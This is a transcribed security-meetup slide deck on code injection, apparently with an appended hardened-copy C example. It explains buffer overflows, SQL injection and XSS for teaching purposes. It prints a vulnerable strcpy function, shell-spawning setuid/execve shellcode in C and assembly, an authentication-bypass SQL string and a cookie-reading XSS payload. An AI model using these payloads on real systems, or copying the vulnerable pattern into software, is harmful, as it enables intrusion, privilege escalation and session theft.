null Pune meet - Application Security: Code injection
null Pune meet - Application Security: Code injection – By Aseem Jakhar



1. Application Security: Understanding and Preventing Code Injection
   - By Aseem Jakhar
2. About me
   - Open source and security phreak.
   - LinkedIn
3. Agenda
   - What is code injection
   - Common code injection techniques
     - Buffer overflow
     - SQL injection
     - Cross-site scripting (XSS)
4. What is code injection?
   - Every program interfaces with the outer world.
   - Input and output.
   - Invalid data.
   - Injecting code instead of data and having it executed as part of the program.
5. Buffer overflow
   - Input length is not checked.
   - The buffer overflows and overwrites the stack.
   - The return address is overwritten.
   - The return address can be invalid or point back to user input.
6. Function call
   - `void foo(int a, int b, ….., int n)`
   - The stack grows towards low memory.

   ```asm
   # Caller:
       push arg n
       ...
       push arg b
       push arg a
       push return address   # eip (done by the call instruction)
   # foo:
       push %ebp
       mov  %esp, %ebp       # new frame pointer (ebp)
       sub  $0x08, %esp      # space for local variables
   ```
7. How does the stack look?
9. Example vulnerable code

   ```c
   #include <string.h>

   int vul_func(char *src)
   {
       char vul_buf[40] = {0};
       …
       strcpy(vul_buf, src);   /* no length check: src longer than 39 bytes overflows vul_buf */
       …
       return 0;
   }
   ```
10. Exploiting buffer overflow
   - Feed the application; check the registers, return address, shellcode offset/start.
   - Create the shellcode with a stable return address.
   - Test it.
   - Binary pwned!!!
11. Feed the application
   - `$ perl -e "print 'A' x 1000"`
   - `$ echo -en "AAAAAAAAAAAAAAAAAA"`
   - Pass the string to the application.
   - Analyze the core dump; check eip and the other registers for 0x41414141.
   - Find the length, offset and a valid return address for our shellcode.
12. Example shellcode: C

   ```c
   #include <unistd.h>

   int main(void)
   {
       setuid(0);
       execve("/bin/sh", NULL, NULL);
       return 0;
   }
   ```

   ```sh
   $ gcc -static -o shell shell.c
   $ objdump --disassemble shell
   ```
13. Example shellcode: Assembly

   ```asm
   mov  $0xd5,%al        # syscall no. for setuid
   xor  %ebx,%ebx        # zero out ebx (pass 0 to setuid)
   int  $0x80            # software interrupt
   xor  %eax,%eax        # zero out eax
   mov  $11,%al          # syscall no. for execve(), stored in eax
   xor  %ebx,%ebx        # zero out the contents
   push %ebx             # push its value (zero: simple hack to avoid 0s in the code)
   push $0x68732f2f      # push the string (2nd half)
   push $0x6e69622f      # push the string (1st half); STRING == /bin/sh
   mov  %esp,%ebx        # 1st argument to execve(): address of the 1st char in the string
   xor  %ecx,%ecx        # 2nd argument to execve(): argv = NULL
   xor  %edx,%edx        # 3rd argument to execve(): envp = NULL
   int  $0x80
   ```

   ```sh
   $ as -o shell.o shell.s && ld -o shell shell.o
   $ objdump --disassemble shell
   ```
14. Demo
15. SQL injection
   - The application sends user input to the DB.
   - An SQL query is generated by concatenating user input directly into a string:

     ```sql
     SELECT field FROM table WHERE value = '$input';
     ```

   - Works perfectly for valid input :-)
16. SQL injection
   - Input meets bad data!
   - What if `$input = foo' or 'a'='a`?

     ```sql
     SELECT field FROM table WHERE value = 'foo' or 'a'='a';
     ```

   - Voila!!!!
   - Unauthorized access, DB manipulation, dropped tables, wrong details entered.
17. SQL injection
18. XSS
   - Injecting script code.
   - Non-persistent (reflected) XSS
     - The server reads the input and reflects the content back.
     - `<script-code>`
   - Persistent (stored) XSS
     - The script is injected into and stored by the web app.
   - `<script>alert(document.cookie)</script>`
19. Conclusion
   - Never ever trust user input.
   - Never ever trust user input.
   - Never ever trust user input.
   - Never ever trust user input.
   - Never ever trust user input.
   - Never ever trust user input.
20. Thank you! Q&A? NULL is looking for phreaks. Contact:
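The 40-byte `vul_buf` from slide 9 beside a bounded copy that refuses input which does not fit, as an added example that is not part of the original deck. `safe_func`, `safe_copy40` and `copy40_of_a_times` are names assumed here; only `vul_func`/`vul_buf` come from the slides.

```c
/* Added example (not from the slides): the strcpy() pattern of slide 9
 * next to a hardened copy that measures before it writes. */
#include <stdio.h>
#include <string.h>

#define VUL_BUF_LEN 40   /* same size as char vul_buf[40] on slide 9 */

/* Slide 9 pattern: no length check, so src longer than 39 bytes runs past
 * vul_buf into the saved ebp and return address laid out on slides 6 and 7.
 * Kept only for contrast; never pass it untrusted input. */
int vul_func(const char *src)
{
    char vul_buf[VUL_BUF_LEN] = {0};
    strcpy(vul_buf, src);           /* unbounded copy: the bug */
    return 0;
}

/* Hardened form: look for the terminator inside the first dst_len bytes,
 * refuse the input if it is not there, and always NUL-terminate dst.
 * Returns 0 on success, -1 when src (with its terminator) would not fit. */
int safe_func(char *dst, size_t dst_len, const char *src)
{
    if (dst == NULL || src == NULL || dst_len == 0)
        return -1;
    const char *end = memchr(src, '\0', dst_len);  /* scan at most dst_len bytes */
    if (end == NULL)
        return -1;                  /* no terminator in range: too long, reject */
    size_t n = (size_t)(end - src); /* n <= dst_len - 1, room for the NUL */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Same buffer size as the slide: 0 = copied, -1 = rejected. */
int safe_copy40(const char *src)
{
    char buf[VUL_BUF_LEN];
    return safe_func(buf, sizeof buf, src);
}

/* Builds "A" x count (slide 11's test input, constructed here) and copies it. */
int copy40_of_a_times(size_t count)
{
    char input[1024];
    if (count >= sizeof input) count = sizeof input - 1;
    memset(input, 'A', count);
    input[count] = '\0';
    return safe_copy40(input);
}

int main(void)
{
    printf("39 x A: %d\n", copy40_of_a_times(39));    /* fits: 0 */
    printf("1000 x A: %d\n", copy40_of_a_times(1000)); /* rejected: -1 */
    return 0;
}
```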